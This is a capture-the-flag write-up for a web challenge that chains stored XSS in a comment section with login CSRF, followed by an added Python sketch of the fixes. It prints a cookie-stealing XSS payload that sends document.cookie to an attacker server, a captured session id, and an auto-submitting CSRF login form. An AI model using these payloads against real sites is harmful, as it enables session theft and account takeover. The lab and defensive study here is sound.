Buy me a coin

by mvs

Points: Level 3/5

Solves: ???

Description:

Buy me a coin

Your goal is to buy the coin that is being sold on the website, despite the fact that you’re broke. You know someone will eventually top up their wallet.

Get the coin to get your answer

Solution

TLDR

You have to make the admin top up your account with money.

  1. You first exploit the comment section with XSS to get the admin to execute your code
  2. Notice the login system is vulnerable to CSRF
  3. Use the XSS to force the admin to log in to one of your accounts via CSRF, and wait for him/her to top up your account

Description

We start by creating an account to do some testing on the service. Once we are logged in, we see that we can buy the token right away, the problem is, we ain’t got no money.

After some more testing, we realized that the deposit feature does not work. This leaves us with three hypotheses:

  • We find a way to get some money in our account and buy a token
  • We buy a token with no money
  • We steal an account with some money to buy the token

The only thing left to test is the comment section. This one is weird because we can submit a comment, but once we refresh the page, the comment vanishes. Nevertheless, we have to check whether someone is reading our comments, so we inject some JavaScript to perform an XSS attack and wait for an answer from the other side. We start by injecting this payload:

<img src=# onerror=document.location="http://myserver/" + document.cookie>

And we got an answer!!!

34.76.56.235 - - [03/Mar/2019:19:51:02 +0000] "GET /PHPSESSID=oujsc3iqj01megj0k80httl935 HTTP/1.1" 404 152 "http://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0.1337"

We now have the session id oujsc3iqj01megj0k80httl935, which may contain some money, or maybe the flag!! Once we use this session id, we see that it belongs to the account noob, and unfortunately this account does not have any token or any money. We also realized that this account is reading all the comments submitted by other accounts.

The challenge description has an interesting sentence: You know someone will eventually top up their wallet. This made us believe that there is some mechanism that is topping up accounts automatically. All we need to do is to make this mechanism top up one of our accounts.

It turns out the login is vulnerable to a CSRF attack. Maybe we could use our XSS to force someone to log in to one of our accounts and hopefully deposit some money into it. Let’s create the exploit x)

This piece of HTML logs in one of our users automatically whenever it is loaded. We just need to host it on a remote server and fire our XSS payload again.

<html>
  <body>
    <form action="https://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" method="POST">
      <input type="hidden" name="username" value="adminn"/>
      <input type="hidden" name="password" value="adminnppp"/>
      <input type="submit"/>
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

We send a new comment pointing to our CSRF exploit, and pray that someone will eventually top up a wallet, which in this case is going to be ours.

<img src=# onerror=document.location="http://myserver/csrf.html">

And Boom, our account has enough money to buy the token!!! After buying, we got the flag!

Flag: flag{you-owned-our-wallet-sneaky-you}
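As an added illustration, not part of the original writeup or the challenge's source, the three weaknesses chained above modelled in Python next to their fixes: the login handler that accepts any cross-site POST beside one that checks the Origin header and a session-bound CSRF token, the comment escaped before it is rendered to the bot, and the cookie flags that would have stopped the document.cookie exfiltration. Function names, the server secret and the session id are constructed assumptions.

```python
import hashlib
import hmac
import html

SITE = "https://c3-f342e5d04f11-ctf.pixels.camp"  # the challenge host from the writeup
SECRET = b"constructed-server-secret"  # placeholder, not a value from the page


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: only a page served by the site
    (which knows the session) can embed the right value in its login form."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def login_weak(form: dict) -> bool:
    """Vulnerable wallet.php behaviour: any POST with credentials is accepted,
    so a form auto-submitted from an attacker's page logs the victim in."""
    return "username" in form and "password" in form


def login_hardened(form: dict, session_id: str, origin: str) -> bool:
    """Login CSRF fix: the request must come from the site itself and carry
    the token derived for the caller's session."""
    if origin != SITE:
        return False
    expected = csrf_token(session_id)
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return False
    return login_weak(form)


def render_comment(text: str) -> str:
    """Stored XSS fix: escape user comments before the admin bot renders them,
    so the <img onerror=...> payload becomes inert text."""
    return html.escape(text, quote=True)


def session_cookie(session_id: str) -> str:
    """Cookie attributes that blunt the chain: HttpOnly keeps the session id out
    of document.cookie, SameSite=Lax drops it from cross-site POSTs."""
    return f"PHPSESSID={session_id}; HttpOnly; Secure; SameSite=Lax"
```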